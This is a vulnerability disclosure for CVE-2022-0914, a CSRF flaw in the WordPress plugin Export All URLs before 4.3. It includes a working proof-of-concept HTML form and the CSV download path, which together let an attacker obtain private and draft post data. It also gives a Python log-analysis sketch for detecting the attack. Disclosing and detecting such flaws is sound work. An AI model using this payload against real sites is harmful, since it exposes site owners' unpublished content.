[31] CVE-2022-0914
During security research I found a CSRF vulnerability. The name of the plugin is: Export All URLs, the version of the affected plugin: < 4.3
Description
The plugin does not have a CSRF check in place when exporting data, which could allow
attackers to make a logged-in admin export all posts and pages
(including private and draft) into an arbitrary CSV file,
which the attacker can then download to retrieve the list of titles, for example.
POC
Make a logged-in admin open:
<html>
<body>
<form action="https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" method="POST">
<input type="hidden" name="post-type" value="any" />
<input type="hidden" name="additional-data[]" value="title" />
<input type="hidden" name="post-status" value="all" />
<input type="hidden" name="posts-from" value="" />
<input type="hidden" name="posts-upto" value="" />
<input type="hidden" name="post-author" value="all" />
<input type="hidden" name="number-of-posts" value="all" />
<input type="hidden" name="starting-point" value="" />
<input type="hidden" name="ending-point" value="" />
<input type="hidden" name="csv-file-name" value="via-csrf" />
<input type="hidden" name="export-type" value="text" />
<input type="hidden" name="export" value="Export Now" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Then open https://example.com/wp-content/uploads/2022/03/via-csrf.CSV as an unauthenticated user
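For defenders, the two requests in the POC leave a recognisable pair in the web server access log: a POST to the export settings page whose Referer is not the site itself, followed by a CSV download from the uploads directory by a different client. The following detection sketch is an added example, not code from the plugin or the original report; it assumes combined log format, and the `SITE_HOST`, `WINDOW` and sample log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "example.com"        # assumption: the WordPress site's own host
WINDOW = timedelta(minutes=30)   # assumption: export-to-download correlation window
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"')
CSV_PATH = re.compile(r"^/wp-content/uploads/\d{4}/\d{2}/[^/]+\.csv$", re.I)

def parse(line):
    m = LINE.match(line)
    if not m:
        return None  # not combined log format; skip
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["url"] = urlsplit(e["target"])
    return e

def is_cross_site_export(e):
    """POST to the export page whose Referer is absent or from another host."""
    u = e["url"]
    return (e["method"] == "POST" and u.path == "/wp-admin/tools.php"
            and parse_qs(u.query).get("page") == ["extract-all-urls-settings"]
            and urlsplit(e["referer"]).hostname != SITE_HOST)

def find_suspicious(lines):
    """Return (export, download) event pairs that warrant investigation."""
    exports, hits = [], []
    for e in filter(None, map(parse, lines)):
        if is_cross_site_export(e):
            exports.append(e)
        elif e["method"] == "GET" and e["status"] == "200" and CSV_PATH.match(e["url"].path):
            for x in exports:  # download by another client shortly after the export
                if x["ip"] != e["ip"] and timedelta(0) <= e["ts"] - x["ts"] <= WINDOW:
                    hits.append((x, e))
    return hits

# Constructed sample: one same-site export and download, then one cross-site pair.
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2022:10:00:00 +0000] "POST /wp-admin/tools.php?page=extract-all-urls-settings HTTP/1.1" 200 5120 "https://example.com/wp-admin/tools.php?page=extract-all-urls-settings" "UA"',
    '192.0.2.10 - - [12/Mar/2022:10:00:05 +0000] "GET /wp-content/uploads/2022/03/report.CSV HTTP/1.1" 200 900 "-" "UA"',
    '192.0.2.10 - - [12/Mar/2022:11:00:00 +0000] "POST /wp-admin/tools.php?page=extract-all-urls-settings HTTP/1.1" 200 5120 "https://other.example/page.html" "UA"',
    '203.0.113.7 - - [12/Mar/2022:11:00:20 +0000] "GET /wp-content/uploads/2022/03/via-csrf.CSV HTTP/1.1" 200 900 "-" "UA"',
]
if __name__ == "__main__":
    for export, download in find_suspicious(SAMPLE):
        print(export["ts"], export["referer"], "->", download["ip"], download["target"])
```

Access logs do not record the POST body, so the chosen CSV file name is only visible in the later download request; the Referer test also flags requests where the header was stripped.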
Additional information
WPSCAN link: https://wpscan.com/vulnerability/c328be28-75dd-43db-a5b9-c1ba0636c930
NIST CVSS SCORE: 6.5
Plugin has 30,000+ active installations.